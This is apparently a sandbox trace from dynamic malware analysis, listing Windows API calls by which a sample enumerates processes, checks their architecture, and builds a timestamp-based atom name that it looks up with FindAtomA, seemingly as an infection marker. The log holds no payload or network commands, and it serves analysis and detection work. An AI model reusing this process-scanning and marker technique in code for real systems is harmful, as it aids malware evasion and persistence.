	[0082.824] CloseHandle (hObject=0x45c) returned 1
	[0082.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0082.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0082.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x45c
	[0082.824] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.824] CloseHandle (hObject=0x45c) returned 1
	[0083.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0083.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0083.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0083.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0083.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0083.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0083.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0083.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0083.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0083.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0083.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0083.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0083.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0083.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0083.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0083.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0083.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0083.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0083.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x45c
	[0083.200] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.200] CloseHandle (hObject=0x45c) returned 1
	[0083.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0083.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0083.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x45c
	[0083.200] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.200] CloseHandle (hObject=0x45c) returned 1
	[0083.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0083.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x45c
	[0083.200] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.200] CloseHandle (hObject=0x45c) returned 1
	[0083.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x45c
	[0083.200] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.200] CloseHandle (hObject=0x45c) returned 1
	[0083.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x45c
	[0083.201] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.201] CloseHandle (hObject=0x45c) returned 1
	[0083.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x45c
	[0083.201] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.201] CloseHandle (hObject=0x45c) returned 1
	[0083.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x45c
	[0083.201] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.201] CloseHandle (hObject=0x45c) returned 1
	[0083.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x45c
	[0083.201] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.201] CloseHandle (hObject=0x45c) returned 1
	[0083.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0083.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x45c
	[0083.201] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.201] CloseHandle (hObject=0x45c) returned 1
	[0083.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x45c
	[0083.202] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.202] CloseHandle (hObject=0x45c) returned 1
	[0083.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x45c
	[0083.202] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.202] CloseHandle (hObject=0x45c) returned 1
	[0083.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0083.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x45c
	[0083.202] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.202] CloseHandle (hObject=0x45c) returned 1
	[0083.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x45c
	[0083.202] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.202] CloseHandle (hObject=0x45c) returned 1
	[0083.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x45c
	[0083.202] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.202] CloseHandle (hObject=0x45c) returned 1
	[0083.203] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x45c
	[0083.203] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.203] CloseHandle (hObject=0x45c) returned 1
	[0083.203] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x45c
	[0083.203] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.203] CloseHandle (hObject=0x45c) returned 1
	[0083.203] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x45c
	[0083.203] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.203] CloseHandle (hObject=0x45c) returned 1
	[0083.203] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x45c
	[0083.203] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.203] CloseHandle (hObject=0x45c) returned 1
	[0083.203] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x45c
	[0083.203] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.203] CloseHandle (hObject=0x45c) returned 1
	[0083.203] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x45c
	[0083.203] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.203] CloseHandle (hObject=0x45c) returned 1
	[0083.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x45c
	[0083.204] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.204] CloseHandle (hObject=0x45c) returned 1
	[0083.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x45c
	[0083.204] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.204] CloseHandle (hObject=0x45c) returned 1
	[0083.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x45c
	[0083.204] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.204] CloseHandle (hObject=0x45c) returned 1
	[0083.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x45c
	[0083.204] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.204] CloseHandle (hObject=0x45c) returned 1
	[0083.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x45c
	[0083.204] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.204] CloseHandle (hObject=0x45c) returned 1
	[0083.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x45c
	[0083.204] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.204] CloseHandle (hObject=0x45c) returned 1
	[0083.205] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x45c
	[0083.205] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.205] CloseHandle (hObject=0x45c) returned 1
	[0083.205] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x45c
	[0083.205] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.205] CloseHandle (hObject=0x45c) returned 1
	[0083.205] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x45c
	[0083.205] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.205] CloseHandle (hObject=0x45c) returned 1
	[0083.205] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x45c
	[0083.205] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.205] CloseHandle (hObject=0x45c) returned 1
	[0083.205] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x45c
	[0083.205] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.205] CloseHandle (hObject=0x45c) returned 1
	[0083.205] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x45c
	[0083.206] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0083.206] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0083.206] GetProcessTimes (in: hProcess=0x45c, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0083.206] wsprintfA (in: param_1=0x759c78, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0083.206] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0083.207] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0083.207] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0083.207] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0083.207] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0083.207] CloseHandle (hObject=0x45c) returned 1
	[0083.207] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0083.207] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0083.207] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x45c
	[0083.207] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.207] CloseHandle (hObject=0x45c) returned 1
	[0083.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0083.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0083.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0083.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0083.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0083.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0083.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0083.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0083.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0083.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0083.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0083.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0083.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0083.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0083.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0083.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0083.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0083.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0083.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x45c
	[0083.411] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.411] CloseHandle (hObject=0x45c) returned 1
	[0083.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0083.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0083.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x45c
	[0083.411] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.411] CloseHandle (hObject=0x45c) returned 1
	[0083.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0083.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x45c
	[0083.411] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.411] CloseHandle (hObject=0x45c) returned 1
	[0083.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x45c
	[0083.412] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.412] CloseHandle (hObject=0x45c) returned 1
	[0083.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x45c
	[0083.412] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.412] CloseHandle (hObject=0x45c) returned 1
	[0083.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x45c
	[0083.412] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.412] CloseHandle (hObject=0x45c) returned 1
	[0083.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x45c
	[0083.412] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.412] CloseHandle (hObject=0x45c) returned 1
	[0083.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x45c
	[0083.412] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.412] CloseHandle (hObject=0x45c) returned 1
	[0083.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0083.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x45c
	[0083.413] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.413] CloseHandle (hObject=0x45c) returned 1
	[0083.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x45c
	[0083.413] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.413] CloseHandle (hObject=0x45c) returned 1
	[0083.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x45c
	[0083.413] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.413] CloseHandle (hObject=0x45c) returned 1
	[0083.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0083.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x45c
	[0083.413] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.413] CloseHandle (hObject=0x45c) returned 1
	[0083.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x45c
	[0083.413] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.414] CloseHandle (hObject=0x45c) returned 1
	[0083.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x45c
	[0083.414] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.414] CloseHandle (hObject=0x45c) returned 1
	[0083.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x45c
	[0083.414] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.414] CloseHandle (hObject=0x45c) returned 1
	[0083.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x45c
	[0083.414] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.414] CloseHandle (hObject=0x45c) returned 1
	[0083.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x45c
	[0083.414] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.414] CloseHandle (hObject=0x45c) returned 1
	[0083.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x45c
	[0083.414] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.414] CloseHandle (hObject=0x45c) returned 1
	[0083.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x45c
	[0083.415] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.415] CloseHandle (hObject=0x45c) returned 1
	[0083.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x45c
	[0083.415] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.415] CloseHandle (hObject=0x45c) returned 1
	[0083.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x45c
	[0083.415] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.415] CloseHandle (hObject=0x45c) returned 1
	[0083.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x45c
	[0083.415] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.415] CloseHandle (hObject=0x45c) returned 1
	[0083.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x45c
	[0083.415] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.415] CloseHandle (hObject=0x45c) returned 1
	[0083.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x45c
	[0083.415] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.415] CloseHandle (hObject=0x45c) returned 1
	[0083.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x45c
	[0083.416] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.416] CloseHandle (hObject=0x45c) returned 1
	[0083.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x45c
	[0083.416] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.416] CloseHandle (hObject=0x45c) returned 1
	[0083.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x45c
	[0083.416] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.416] CloseHandle (hObject=0x45c) returned 1
	[0083.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x45c
	[0083.416] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.416] CloseHandle (hObject=0x45c) returned 1
	[0083.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x45c
	[0083.416] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.416] CloseHandle (hObject=0x45c) returned 1
	[0083.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x45c
	[0083.416] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.416] CloseHandle (hObject=0x45c) returned 1
	[0083.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x45c
	[0083.417] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.417] CloseHandle (hObject=0x45c) returned 1
	[0083.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x45c
	[0083.417] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0083.417] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0083.417] GetProcessTimes (in: hProcess=0x45c, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0083.417] wsprintfA (in: param_1=0x759c78, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0083.418] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0083.418] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0083.418] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0083.418] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0083.418] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0083.418] CloseHandle (hObject=0x45c) returned 1
	[0083.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0083.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0083.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x45c
	[0083.419] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.419] CloseHandle (hObject=0x45c) returned 1
	[0083.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0083.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0083.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0083.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0083.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0083.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0083.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0083.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0083.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0083.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0083.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0083.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0083.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0083.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0083.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0083.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0083.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0083.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
